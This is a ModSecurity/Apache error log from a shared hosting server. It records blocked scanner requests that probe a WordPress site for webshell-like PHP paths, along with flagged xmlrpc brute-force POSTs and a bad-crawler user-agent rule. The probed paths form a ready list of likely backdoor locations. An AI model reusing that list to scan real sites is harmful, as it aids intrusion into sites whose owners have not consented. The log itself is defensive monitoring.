[Tue May 26 13:52:31.382859 2026] [security2:error] [pid 560287:tid 560517] [client 91.230.225.177:51927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahVYR5mX5s6sDS3wJVccugAAAOM"]
[Tue May 26 13:52:31.839701 2026] [security2:error] [pid 560287:tid 560419] [client 91.230.225.178:59611] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/css/admin.php"] [unique_id "ahVYR5mX5s6sDS3wJVccvwAAAIY"]
[Tue May 26 13:52:32.213698 2026] [security2:error] [pid 560287:tid 560432] [client 185.92.25.99:60367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahVYSJmX5s6sDS3wJVcczgAAAJM"]
[Tue May 26 13:52:32.465817 2026] [security2:error] [pid 560287:tid 560493] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYSJmX5s6sDS3wJVccygAAAMw"]
[Tue May 26 13:52:32.922889 2026] [security2:error] [pid 560287:tid 560427] [client 185.92.25.105:47573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/autoload_classmap.php"] [unique_id "ahVYSJmX5s6sDS3wJVcc1AAAAI4"]
[Tue May 26 13:52:32.995361 2026] [security2:error] [pid 560287:tid 560425] [client 129.222.147.134:48551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYSJmX5s6sDS3wJVcc2AAAAIw"]
[Tue May 26 13:52:32.999107 2026] [security2:error] [pid 560287:tid 560425] [client 129.222.147.134:48551] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYSJmX5s6sDS3wJVcc2AAAAIw"]
[Tue May 26 13:52:33.338071 2026] [security2:error] [pid 560287:tid 560456] [client 185.92.25.95:53713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp_wlx.php"] [unique_id "ahVYSZmX5s6sDS3wJVcc4wAAAKk"]
[Tue May 26 13:52:34.068325 2026] [security2:error] [pid 560287:tid 560495] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYSZmX5s6sDS3wJVcc6AAAAM4"]
[Tue May 26 13:52:34.177314 2026] [ssl:error] [pid 560287:tid 560440] [client 98.88.137.2:34656] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcalendars.holix.ktmadvance-senegal.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:52:34.363692 2026] [security2:error] [pid 560287:tid 560498] [client 185.92.25.104:23741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/js/wp-conflg.php"] [unique_id "ahVYSpmX5s6sDS3wJVcc-gAAANE"]
[Tue May 26 13:52:35.967311 2026] [security2:error] [pid 555743:tid 555994] [client 185.192.71.240:40151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/assets/husky301.php"] [unique_id "ahVYS8jqAquC0YaxQjC8owAAAYM"]
[Tue May 26 13:52:36.137563 2026] [security2:error] [pid 555743:tid 555927] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYS8jqAquC0YaxQjC8nQAAAUA"]
[Tue May 26 13:52:36.453302 2026] [security2:error] [pid 560287:tid 560545] [client 185.92.25.98:44773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVYTJmX5s6sDS3wJVcdFAAAAP0"]
[Tue May 26 13:52:37.396081 2026] [security2:error] [pid 555743:tid 555997] [client 185.92.25.136:36475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/blue/wp-trackback.php"] [unique_id "ahVYTcjqAquC0YaxQjC8sgAAAYY"]
[Tue May 26 13:52:37.474837 2026] [security2:error] [pid 555743:tid 555913] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYTcjqAquC0YaxQjC8rwAAATI"]
[Tue May 26 13:52:37.763286 2026] [security2:error] [pid 560287:tid 560440] [client 91.230.225.177:25871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/themes/chosen.php"] [unique_id "ahVYTZmX5s6sDS3wJVcdLQAAAJs"]
[Tue May 26 13:52:38.166990 2026] [security2:error] [pid 560287:tid 560426] [client 91.230.225.168:41891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-header.php"] [unique_id "ahVYTpmX5s6sDS3wJVcdNQAAAI0"]
[Tue May 26 13:52:38.514138 2026] [security2:error] [pid 560287:tid 560472] [client 106.192.248.115:52647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYTpmX5s6sDS3wJVcdPQAAALg"]
[Tue May 26 13:52:38.551843 2026] [security2:error] [pid 560287:tid 560472] [client 106.192.248.115:52647] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYTpmX5s6sDS3wJVcdPQAAALg"]
[Tue May 26 13:52:38.565895 2026] [security2:error] [pid 560287:tid 560462] [client 185.192.71.234:38637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVYTpmX5s6sDS3wJVcdQAAAAK8"]
[Tue May 26 13:52:39.747297 2026] [security2:error] [pid 560287:tid 560531] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYT5mX5s6sDS3wJVcdTQAAAPE"]
[Tue May 26 13:52:39.948399 2026] [security2:error] [pid 555743:tid 556000] [client 185.92.25.136:29423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/Marvins.php"] [unique_id "ahVYT8jqAquC0YaxQjC8xAAAAYk"]
[Tue May 26 13:52:40.768488 2026] [security2:error] [pid 560287:tid 560475] [client 85.208.96.206:23324] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow/list/"] [unique_id "ahVYUJmX5s6sDS3wJVcdYgAAALs"]
[Tue May 26 13:52:40.768607 2026] [security2:error] [pid 560287:tid 560475] [client 85.208.96.206:23324] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow/list/"] [unique_id "ahVYUJmX5s6sDS3wJVcdYgAAALs"]
[Tue May 26 13:52:41.394291 2026] [security2:error] [pid 555743:tid 555949] [client 185.92.25.98:60191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/about.php"] [unique_id "ahVYUcjqAquC0YaxQjC80wAAAVY"]
[Tue May 26 13:52:41.426939 2026] [security2:error] [pid 560287:tid 560494] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYUZmX5s6sDS3wJVcdaQAAAM0"]
[Tue May 26 13:52:41.749490 2026] [security2:error] [pid 560287:tid 560430] [client 185.92.25.97:42899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-class.php"] [unique_id "ahVYUZmX5s6sDS3wJVcdcQAAAJE"]
[Tue May 26 13:52:42.167882 2026] [security2:error] [pid 560287:tid 560476] [client 185.92.25.95:54741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/images/smilies/index.php"] [unique_id "ahVYUpmX5s6sDS3wJVcddQAAALw"]
[Tue May 26 13:52:42.743702 2026] [security2:error] [pid 560287:tid 560544] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYUpmX5s6sDS3wJVcdeAAAAPw"]
[Tue May 26 13:52:42.913025 2026] [security2:error] [pid 560287:tid 560443] [client 185.192.71.245:40055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 245.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/xx.php"] [unique_id "ahVYUpmX5s6sDS3wJVcdgQAAAJ0"]
[Tue May 26 13:52:43.288781 2026] [security2:error] [pid 560287:tid 560444] [client 185.192.71.239:28013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/autoload_classmap.php"] [unique_id "ahVYU5mX5s6sDS3wJVcdiwAAAJ4"]
[Tue May 26 13:52:43.512619 2026] [security2:error] [pid 560287:tid 560373] [remote 207.46.13.153:30406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.13.46.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "api.lagoslawntennisclub1895.com"] [uri "/api/v1/coaches_list.php"] [unique_id "ahVYU5mX5s6sDS3wJVcdjQAA51Q"], referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 13:52:43.541028 2026] [security2:error] [pid 560287:tid 560499] [client 140.213.144.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYU5mX5s6sDS3wJVcdiQAAANI"]
[Tue May 26 13:52:43.833111 2026] [security2:error] [pid 555743:tid 555876] [client 185.92.25.100:61239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/classwithtostring.php"] [unique_id "ahVYU8jqAquC0YaxQjC86AAAAQ0"]
[Tue May 26 13:52:44.261904 2026] [security2:error] [pid 555743:tid 555905] [client 185.192.71.235:36509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/blue.php"] [unique_id "ahVYVMjqAquC0YaxQjC87QAAASo"]
[Tue May 26 13:52:44.637042 2026] [security2:error] [pid 555743:tid 555982] [client 106.192.248.115:52966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYVMjqAquC0YaxQjC87wAAAXc"]
[Tue May 26 13:52:44.637198 2026] [security2:error] [pid 555743:tid 555982] [client 106.192.248.115:52966] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYVMjqAquC0YaxQjC87wAAAXc"]
[Tue May 26 13:52:44.732681 2026] [security2:error] [pid 555743:tid 555922] [client 129.222.147.134:42821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYVMjqAquC0YaxQjC88AAAATs"]
[Tue May 26 13:52:44.737797 2026] [security2:error] [pid 555743:tid 555922] [client 129.222.147.134:42821] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYVMjqAquC0YaxQjC88AAAATs"]
[Tue May 26 13:52:45.169997 2026] [security2:error] [pid 555743:tid 555891] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYVMjqAquC0YaxQjC88wAAARw"]
[Tue May 26 13:52:45.716126 2026] [security2:error] [pid 560287:tid 560470] [client 185.192.71.231:45153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/content.php"] [unique_id "ahVYVZmX5s6sDS3wJVcdqQAAALY"]
[Tue May 26 13:52:46.930466 2026] [security2:error] [pid 555743:tid 555937] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYVsjqAquC0YaxQjC9CAAAAUo"]
[Tue May 26 13:52:47.206101 2026] [security2:error] [pid 560287:tid 560500] [client 185.92.25.137:41927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/uploads/about.php"] [unique_id "ahVYV5mX5s6sDS3wJVcdwgAAANM"]
[Tue May 26 13:52:47.814229 2026] [security2:error] [pid 555743:tid 555884] [client 91.230.225.173:38649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/wp-login.php"] [unique_id "ahVYV8jqAquC0YaxQjC9GAAAARU"]
[Tue May 26 13:52:48.149411 2026] [security2:error] [pid 555743:tid 555927] [client 185.192.71.243:64991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/rest-api/endpoints/index.php"] [unique_id "ahVYWMjqAquC0YaxQjC9KgAAAUA"]
[Tue May 26 13:52:48.607113 2026] [security2:error] [pid 560287:tid 560436] [client 185.92.25.95:43777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/languages/about.php"] [unique_id "ahVYWJmX5s6sDS3wJVcd0wAAAJc"]
[Tue May 26 13:52:48.619826 2026] [security2:error] [pid 555743:tid 555976] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYWMjqAquC0YaxQjC9LQAAAXE"]
[Tue May 26 13:52:49.043786 2026] [security2:error] [pid 560287:tid 560449] [client 185.192.71.243:61097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/wp-theme-editor/include.php"] [unique_id "ahVYWZmX5s6sDS3wJVcd2wAAAKM"]
[Tue May 26 13:52:49.414450 2026] [security2:error] [pid 555743:tid 555960] [client 185.92.25.136:20151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/up/main.php"] [unique_id "ahVYWcjqAquC0YaxQjC9PAAAAWE"]
[Tue May 26 13:52:49.774991 2026] [security2:error] [pid 555743:tid 555998] [client 91.230.225.176:25511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 176.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/fonts/fontawesome-webfont.php"] [unique_id "ahVYWcjqAquC0YaxQjC9RAAAAYc"]
[Tue May 26 13:52:50.168966 2026] [security2:error] [pid 560287:tid 560418] [client 185.192.71.245:57701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 245.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/wp-conflg.php"] [unique_id "ahVYWpmX5s6sDS3wJVcd7QAAAIU"]
[Tue May 26 13:52:50.654261 2026] [security2:error] [pid 560287:tid 560514] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYWpmX5s6sDS3wJVcd8QAAAOA"]
[Tue May 26 13:52:51.678112 2026] [security2:error] [pid 560287:tid 560530] [client 185.192.71.245:27121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 245.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/includes/about.php"] [unique_id "ahVYW5mX5s6sDS3wJVceFwAAAPA"]
[Tue May 26 13:52:52.201415 2026] [security2:error] [pid 555743:tid 555912] [client 185.192.71.230:20839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVYXMjqAquC0YaxQjC9WwAAATE"]
[Tue May 26 13:52:52.274464 2026] [security2:error] [pid 560287:tid 560475] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYW5mX5s6sDS3wJVceHQAAALs"]
[Tue May 26 13:52:53.623323 2026] [security2:error] [pid 555743:tid 555926] [client 185.192.71.227:25539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/images/about.php"] [unique_id "ahVYXcjqAquC0YaxQjC9agAAAT8"]
[Tue May 26 13:52:53.704904 2026] [security2:error] [pid 560287:tid 560462] [client 129.222.147.134:43924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYXZmX5s6sDS3wJVcePQAAAK8"]
[Tue May 26 13:52:53.705088 2026] [security2:error] [pid 560287:tid 560462] [client 129.222.147.134:43924] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYXZmX5s6sDS3wJVcePQAAAK8"]
[Tue May 26 13:52:53.773557 2026] [security2:error] [pid 560287:tid 560422] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYXZmX5s6sDS3wJVcePAAAAIk"]
[Tue May 26 13:52:54.305922 2026] [security2:error] [pid 555743:tid 555987] [client 185.192.71.243:35559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/class.php"] [unique_id "ahVYXsjqAquC0YaxQjC9ewAAAXw"]
[Tue May 26 13:52:54.578099 2026] [core:crit] [pid 555743:tid 555892] (13)Permission denied: [client 52.167.144.220:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
